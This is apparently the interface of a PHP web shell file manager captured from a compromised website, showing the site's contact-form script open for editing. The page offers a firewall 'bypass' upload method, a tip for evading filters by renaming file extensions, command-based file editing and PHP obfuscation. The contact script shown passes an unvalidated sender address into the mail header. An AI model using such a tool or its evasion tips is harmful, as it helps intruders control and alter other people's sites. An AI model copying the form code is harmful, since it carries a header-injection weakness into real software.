Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
home
sofftech
akshargranth.apninokari.com
File Name:
<?php # LIST EMAIL ADDRESS $recipient = "shishrawat01@gmail.com"; # SUBJECT (Subscribe/Remove) $subject ="Contact from website"; # RESULT PAGE //$location = "success!!!"; ## FORM VALUES ## # SENDER $name =$_POST['name']; $email =$_POST['email'] ; $message =$_POST['msg'] ; # MAIL BODY $body= "Sir please contact me. My Name and phone number is given below-\n Name: ".$name." \n Message: ".$message." "; # add more fields here if required ## SEND MESSGAE ## mail( $recipient, $subject, $body, "From: $email" ) or die ("Mail could not be sent."); ## SHOW RESULT PAGE ## echo"Thank you."; ?>
Bypass Options
Select edit method
Using basic write file
Using command
Info
Info!
If the strings too long, it will be failed to edit file (command method only).
Obfuscate PHP:
No Obfuscate
Obfuscate
Save Changes